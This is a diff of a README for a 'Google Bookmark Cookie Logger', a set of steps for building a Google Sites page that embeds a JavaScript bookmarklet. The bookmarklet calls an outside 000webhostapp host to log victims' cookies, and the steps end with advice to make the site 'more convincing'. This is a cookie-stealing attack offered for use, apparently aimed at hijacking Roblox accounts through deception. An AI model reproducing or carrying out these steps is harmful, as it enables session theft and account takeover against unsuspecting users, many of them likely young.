leecade08/Google-Bookmark-Cookie-Logger/README.md

 # Google-Bookmark-Cookie-Logger
 Google Sites Bookmark Cookie Logger Method

  1.Go to sites.google.com and make a new site

-2.Go to <embed> and embed code
+ 2.Go to "<'embed'>" and embed code

-3. Paste the code from down below in
+3. Paste the code from the txt file

-4.Delete PasteJavaHere and paste your own Javascript
+ 4.Find and delete PasteJavaHere and paste your own Javascript

  (dont have a javascript?, go to https://robloxclothingbeta.000webhostapp.com/index.html click on the site and make one)

  5. Delete the "" and replace with '' like this below

  "xJavascript:$.get("//robloxclothingbeta.000webhostapp.com/api.php?id=123456")"

  to

  "xJavascript:$.get('//robloxclothingbeta.000webhostapp.com/api.php?id=123456')"

  6. Hit ok design your site to make it more convincing, upload site and you are done!